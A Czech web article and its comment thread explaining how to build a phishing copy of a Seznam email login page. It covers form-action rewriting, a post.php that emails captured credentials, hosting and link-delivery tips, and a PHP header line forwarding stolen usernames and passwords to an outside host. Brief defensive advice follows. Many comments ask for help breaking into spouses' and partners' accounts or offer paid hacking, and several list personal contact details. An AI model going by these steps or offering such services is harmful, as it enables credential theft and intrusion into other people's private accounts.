Kategorie: IT, Hacking

Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?

Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...

hack email

Autor: KdoSiOdJinud | Vydáno: 11.12.2011 11:22 | Přečteno: 164996x | Komentářů: 258

Aktualizováno 11.12.2011

"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein

Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!

Hesla typu "Q.q!SaW_2" jsou zbytečná!

    Co útočníkovi stačí:

  • stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
  • šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
  • základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
  • šikovnost a využití vaší hlouposti

Jak bude postupovat:

  • jde na přihlašovací stránku a stáhne ji podobně jako na obrázku

    source
  • vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
  • otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek

    source
  • nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
  • přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
  • nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
  • takový odkaz pak může poslat pomocí fake maileru nebo icq

Pár tipů

Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.

ErrorDocument 404 /login.html

Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:

<div style="display: none;"><!--reklama--></div>

Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:

header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);

Jak se bránit? Stačí dodržovat tyto zásady:

  • neklikejte na odkazy příchozí z neznámých adres a čísel
  • neklikejte na odkazy které mají podivnou url
  • zbystřete jestliže po vás odkaz vyžaduje heslo
  • čtěte url a uvažujte
  • pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)

Odkazy

Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): SMAZÁNO

Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!

Komentáře rss

Pokud hledáte službu či máte dotaz mimo téma článku, využijte prosím sekci Nabídky / poptávky.


Strana:  1 2 3 4 5 6 7 8   další »
, Heslo na email odpovědět

Dobrý večer,můžete mi zjistit heslo na můj email - janafaitova@seznam.cz
Nejspíš se mi tam někdo naboural,nemůžu se přihlásit,děkuji. Můžete poslat na email - bart50@seznam.cz

, prosim odpovědět

Dobrý den potřebovala bych hacknout email svého přítele mám pocit ze si píše s nějakou milenkou. Prosím pomozte

, - odpovědět

Zjistit heslo na cizí mail je poměrně jednoduché.
Mohu to i naučit. [cenzurovano]

odpověděl(a)

Samozřejmě to jsem schopen zdarma předvést

odpověděl(a)

Potřeboval bych zjistit heslo e-mailu manželky, ale jsem počítačový analfabet. Prosím o pomoc!

, - odpovědět

Zdravím všechny, co mám dělat když: jednomu kolegovi se už delší dobu nabourává někdo do mailu, nepomohla změna hesla, vždy se po nějaké době opět jeho mail stane čitelným, jsou z něho odesílány maily, které on neposílá a naopak mu kdosi posílá z adres, které má v adresáři zprávy, kteří ti dotyční neposílají, tento problém musí být někde v hlubší bázi než jen u pouhého hacknutí hesel, to by ten člověk musel naboudat desítky mailů, aby takovouto činnost mohl provádět, je to hrozně obtěžující i ode mne mu přišel dopis, který jsem v životě nepsala, byla to velice nepříjemná záležitost. Mohl by někdo poradit, co v takovém případě dělat. Dnes například mu zmizela zpráva přímo před očim, byla v seznamu zpráv doručená nová a sotva si stačil na ni kliknout a otevřít tak najednou nebyla a nikde, ani v koši nikde ...
mohl byste mi s tím někdo poradit?

, Script odpovědět

Čus, máte někdo ještě ten celej a funkční script? Pls.. >>> [cenzurovano]

, Help? odpovědět

Hi everyone! :)

Nabizim pomoc s prolomenim hesel, napiste mi e-mail, domluvime se! 10

odpověděl(a)

[cenzurovano] 10

, heslo odpovědět

dobrýden obracím se na vás s velkou prosbou zjištěníhesla k mému e mailovému účtu na seznam.cz e mail jsem si zakládal již před dlouhou dobou a bohužel si nepamatuji kontrolní otázku a tímpádem mi odmítají poslat heslo . je to por mě velmi důležité tneto e mail mám několik let jedná se o účet [cenzurovano] předem děkuji za váš čas budu vám velmi vděčnýs pozdravem Michael Šalamon 1

, změněný firemní email odpovědět

Dobrý den.

Mám celkem velký problém. Někdo mi změnil heslo na firemním emailu na Seznam.cz. Nemůžu se tedy dostat k objednávkám a novým emailům, které přichází. Prosím, je zde někdo, kdo mi s tímto dokáže pomoci? Seznam nápověda, nebo nějaký kontakt je možný od pondělí, což je pro mě již teď celkem pozdě.

Děkuji za jakoukoliv odpověď

, umí to fakt někdo? odpovědět

Fakt to někdo umí??? Nějak tomu přestávám věřit, páč kdo tomu rozumí mi tvrdí, že to není taková sranda - spíš, že je to téměř nemožný....tak by mne zajímalo - dostal tu fakt někdo heslo? A pokud jo, tak bych brala kontakt :-D dííík

, email odpovědět

Ahoj, potřebuji pomoct s jedním emailem - kdo to umí a má zájem pls ozvěte se na [cenzurovano] diky

, - odpovědět

Poradím s čímkoliv, neváhejte se zeptat.

[cenzurovano]

R.

odpověděl(a)

dobrý den,
někdo se mi naboural do emailu je možné zjistit kdo nebo odkud.
nabízím finanční odměnu za toto zjištění.
díky martin

, heslo odpovědět

Už někdo dostal heslo k emailu ?

icon odpověděl(a)

Ahoj, jak jsem tu již několikrát v komentářích a i článcích zmiňoval. 99% lidí co vám nabízí na webu veřejně zjištění hesel jsou podvodníci, kteří vyberou provizi a zmizí.

Osobně si myslím, že zjišťovat cizí heslo vám do budoucna jen přidělá starosti než užitek. Ať už jej zjistíte nebo ne :)

odpověděl(a)

DOBRA RADA☺ A VAROVANI PRO ZADOSTIVE CHTEJICI NEJAKA HESLA.
1) POKUD ZDE V DISKUZI NEKDO ZA UPLATU NABIZI ZISKANI HESLA A NEJDE O VAS UCET JE TO MINIMALNE NEETICKE CO KDYBY TO NEKDO UDELAL VAM
2) TITO DOTYCNI, POKUD JSOU TOHOTO SCHOPNI (vetsinou nejsou), JSOU NEVEROHODNI A MUZOU (Z VALNE VETSINY TO JISTE UDELAJI) VAM POMOCI LSTI NAOPAK NAPR. ZAHESLOVAT/SMAZAT, VASE UCTY, ZAVIROVAT PC, ZAKODOVAT HRADISK NEBO NECO UKRAST, VYKRAST, ZALOZIST NA VASE JMENO UVER/SMENKU/DLUH, ZNEUZIT, ZKOPIROVAT VASE DATA I NAPR. Z MOBILU APOD.
3)POKUD UZ CHCETE NEJAKE HESLO TREBA K E-MAILU VYZKOUSEJTE DOTYCNE ABYSTE NEPRISLI O PENIZE TAKTO: ZALOZTE TESTOVACI E-MAIL SE SLOZITYM HESLEM NAPR. j2SoP5N@QR-€eWpwT na prislusne domene, poslete na nej nejaky soubor prilohu ve zprave a po domluve s Panem Louskacem hesel jej pozadejte o to, aby vam toto heslo rekl a pripadne i sdelil obsah vaseho souboru. Predtim ovsem nesmi vedet, kdo jste ci odkud se propojujete, mohl by totiz heslo ziskat primo od vas jinou metodou. Potom by ale prosel timto testem ikdyz by jine heslo nedovedl nerozlousknul.
4)VZDY EXISTUJE MOZNOST PRI ZTRATE HESEL ZEPTAT SE/NECHAT RESETOVAT HESLO PROVOZOVATELEM SCHRANKY, KDYZ MU VEROHODNE DOLOZITE ZE SE TO STALO A ZE JSTE VLASTNIKEM TOHOTO E-MAILU napr. svedectvim

, heslo na ....@volny.cz odpovědět

Hledám někoho,kdo umí 100% zjistit heslo na...@volny.cz. Moc nutné a spěchá!Fin.odměna jistá! 3 10

, Heslo a pomoc odpovědět

TQYBTMYAATH@seznam.cz
Neexistuje !!!!
Jak je to možné ?????

, - odpovědět

Zdravim, je tu psáno že je to úplně jednoduché, může mi teda někdo nahrát video jak hackne nějakej email ? třeba hned vytvořenej pro hacknutí. můžete to odeslat na zeliku@seznam.cz a Díky

odpověděl(a)

Mám základy v Html a snažil jsem se o Php. Takže jestli můžu poprosit tak aby to video bylo stručné :)

, heslo odpovědět

Potřebuji zjistit heslo na @gmail.com
Pokud je to reálné sdělte podmínky na
email amik@post.cz

, heslo odpovědět

Hledám profíka který umí zjistit heslo na seznamu. Rychlá domluva nadstandartní odměna! Spěchá

odpověděl(a)

Napiš na vit.pinkulinka@gmail.com

odpověděl(a)

povedlo se? mohu byt napomocen...

odpověděl(a)

fany, mohl bys mi napsat na almandin1979@gmail.com ?
Stále hledám

odpověděl(a)

Ahoj, potřebuji pomoct s jedním emailem - kdo to umí a má zájem pls ozvěte se na id.bombing@yahoo.com diky

, email odpovědět

Potrebujem sa dostat do svojho emailu na azet.sk
Mam ho prepojeny z FB a nemozem sa dostat ani po kontrolnych otazkach ,ktore mi poslali lebo ten email uz mam cca 15rokov,takze som uplne v prdeli! Pomozete mi prosim

, - odpovědět

Ve svém volném čase vám nabízím moji pomoc.
Pokud máte zájem - kontaktujte mě.

skype: one-fawkes-crew
email: one-fawkes-crew@hotmail.com

#ONE:FAWKES:CREW#
__Hackers:CREW:__

odpověděl(a)

Ahoj potrebovala bych tvoji pomoc.

odpověděl(a)

ahoj mel bych prosbu,pokud nejsi moc zaneprazdnenej?!mam mensi problem,moje zena zaboha nemuze prijit na heslo atd.(ani po kontrolnich otazkach) Do seznamu (nikam si to nenapsala-samo (-: )!potrebovali by sme se tam nutne dostat-potrebne dokumenty atd.!Dalsi vec-jak si asi tak cenis sve sluzby?dej mi pls vedet diky mirek

odpověděl(a)

mirek odpověděl(a) (7.12.2013 11:20)

ahoj mel bych prosbu,pokud nejsi moc zaneprazdnenej?!mam mensi problem,moje zena zaboha nemuze prijit na heslo atd.(ani po kontrolnich otazkach) Do seznamu (nikam si to nenapsala-samo (-: )!potrebovali by sme se tam nutne dostat-potrebne dokumenty atd.!Dalsi vec-jak si asi tak cenis sve sluzby?dej mi pls vedet diky mirek bud na mail nebo treba na tel. 777342387

odpověděl(a)

pokud mate zajem o moji pomoc kontaktujte me. Email: one-fawkes-crew@hotmail.com

odpověděl(a)

někdo se mně naboural na muj pravej email a nevym jak mohu ziskat heslo spatky od emailu c2009Sevcik@seznam.cz vše jsem skoušel uplně všecko

odpověděl(a)

Prosím ozvěte se mi na jananov55@email.cz
Děkuji

, Zjistím heslo odpovědět

to umí každý začátečník 1

odpověděl(a)

dokázal by jsi zjistit heslo na email enevy@seznam.cz

dík

odpověděl(a)

Uveďte na sebe kontakt nebo se mi rovnou ozvěte na receptor@atlas.cz


Strana:  1 2 3 4 5 6 7 8   další »